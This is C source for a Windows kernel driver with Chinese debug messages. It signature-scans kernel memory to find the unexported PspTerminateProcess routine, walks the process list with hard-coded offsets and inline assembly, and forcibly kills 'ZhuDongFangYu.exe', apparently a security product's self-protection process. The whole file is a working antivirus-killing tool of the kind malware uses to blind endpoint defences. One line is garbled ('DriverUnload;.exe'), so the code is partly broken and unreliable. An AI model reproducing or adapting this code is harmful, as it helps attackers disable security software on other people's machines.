#include <ntddk.h>
typedef
struct
_LDR_DATA_TABLE_ENTRY
{
LIST_ENTRY InLoadOrderLinks;
LIST_ENTRY InMemoryOrderLinks;
LIST_ENTRY InInitializationOrderLinks;
PVOID
DllBase;
PVOID
EntryPoint;
UINT32
SizeOfImage;
UNICODE_STRING FullDllName;
UNICODE_STRING BaseDllName;
UINT32
Flags;
UINT16 LoadCount;
UINT16 TlsIndex;
LIST_ENTRY HashLinks;
PVOID
SectionPointer;
UINT32
CheckSum;
UINT32
TimeDateStamp;
PVOID
LoadedImports;
PVOID
EntryPointActivationContext;
PVOID
PatchInformation;
} LDR_DATA_TABLE_ENTRY, * PLDR_DATA_TABLE_ENTRY;
NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path);
VOID
GetKernelBase(PDRIVER_OBJECT driver,
PVOID
* pKrnlBase,
PUINT32
uKrnlImageSize);
PVOID
MemorySearch(
PVOID
featureCode,
UINT32
featureCodeLen,
PVOID
pBeginAddress,
PVOID
pEndAddress);
PEPROCESS GetPEPROCESS(
PCHAR
processName);
VOID
DriverUnload(PDRIVER_OBJECT driver);
typedef
NTSTATUS(*_PspTerminateProcess)(PEPROCESS pEprocess, NTSTATUS ExitCode);
_PspTerminateProcess PspTerminateProcess;
PVOID
pKrnlBase;
UINT32
uKrnlImageSize;
PEPROCESS pEprocess;
NTSTATUS DriverEntry(PDRIVER_OBJECT driver, PUNICODE_STRING reg_path)
{
UNREFERENCED_PARAMETER(reg_path);
UINT32
featureCode[] = {
0x0124a164, 0x758b0000, 0x44703b08, 0x0db80775,
0xebc00000, 0xbe8d575a, 0x00000248, 0x200147f6,
0x868d1274, 0x00000174
};
GetKernelBase(driver, &pKrnlBase, &uKrnlImageSize);
DbgPrint(
"内核基址: %p,大小: %X\n"
, pKrnlBase, uKrnlImageSize);
PspTerminateProcess = (_PspTerminateProcess)MemorySearch(featureCode,
sizeof
(featureCode), pKrnlBase, (
PVOID
)((
UINT32
)pKrnlBase + uKrnlImageSize));
DbgPrint(
"PspTerminateProcess: %p\n"
, PspTerminateProcess);
PEPROCESS pEprocess = GetPEPROCESS(
"ZhuDongFangYu.exe"
);
DbgPrint(
"pEprocess:%p.\n"
, pEprocess);
if
(pEprocess == 0)
{
return
0;
}
PspTerminateProcess(pEprocess, 0);
DbgPrint(
"ZhuDongFangYu.exe 被关闭了.\n"
);
driver->DriverUnload = DriverUnload;.exe
return
STATUS_SUCCESS;
}
VOID
GetKernelBase(PDRIVER_OBJECT driver,
PVOID
* ppKrnlBase,
PUINT32
puKrnlImageSize){
PLDR_DATA_TABLE_ENTRY pLdteHead;
PLDR_DATA_TABLE_ENTRY pLdteCur;
UNICODE_STRING usKrnlBaseDllName;
RtlInitUnicodeString(&usKrnlBaseDllName, L
"ntoskrnl.exe"
);
pLdteHead = (PLDR_DATA_TABLE_ENTRY)driver->DriverSection;
pLdteCur = pLdteHead;
do
{
PLDR_DATA_TABLE_ENTRY pLdte = CONTAINING_RECORD(pLdteCur, LDR_DATA_TABLE_ENTRY, InLoadOrderLinks);
if
(RtlCompareUnicodeString(&pLdte->BaseDllName, &usKrnlBaseDllName, TRUE) == 0)
{
*ppKrnlBase = pLdte->DllBase;
*puKrnlImageSize = pLdte->SizeOfImage;
return
;
}
pLdteCur = (PLDR_DATA_TABLE_ENTRY)pLdte->InLoadOrderLinks.Flink;
}
while
(pLdteHead != pLdteCur);
return
;
}
PVOID
MemorySearch(
PVOID
featureCode,
UINT32
featureCodeeLen,
PVOID
pBeginAddress,
PVOID
pEndAddress)
{
PVOID
pCur = pBeginAddress;
while
(pCur != pEndAddress)
{
if
(RtlCompareMemory(featureCode, pCur, featureCodeeLen) == featureCodeeLen)
{
return
(
PUINT32
)((
UINT32
)pCur - 6);
}
((
UINT32
)pCur)++;
}
return
0;
}
PEPROCESS GetPEPROCESS(
PCHAR
processName)
{
PEPROCESS pEprocess, pCurProcess;
PCHAR
ImageFileName;
__asm
{
mov eax, fs: [0x124] ;
mov eax, [eax + 0x44];
mov pEprocess, eax;
}
pCurProcess = pEprocess;
do
{
ImageFileName = (
PCHAR
)pCurProcess + 0x174;
if
(
strcmp
(ImageFileName, processName) == 0)
{
return
pCurProcess;
}
pCurProcess = (PEPROCESS)(*(
PULONG
)((
ULONG
)pCurProcess + 0x88) - 0x88);
}
while
(pEprocess != pCurProcess);
return
0;
}
VOID
DriverUnload(PDRIVER_OBJECT driver)
{
UNREFERENCED_PARAMETER(driver);
DbgPrint(
"驱动卸载成功\n"
);
}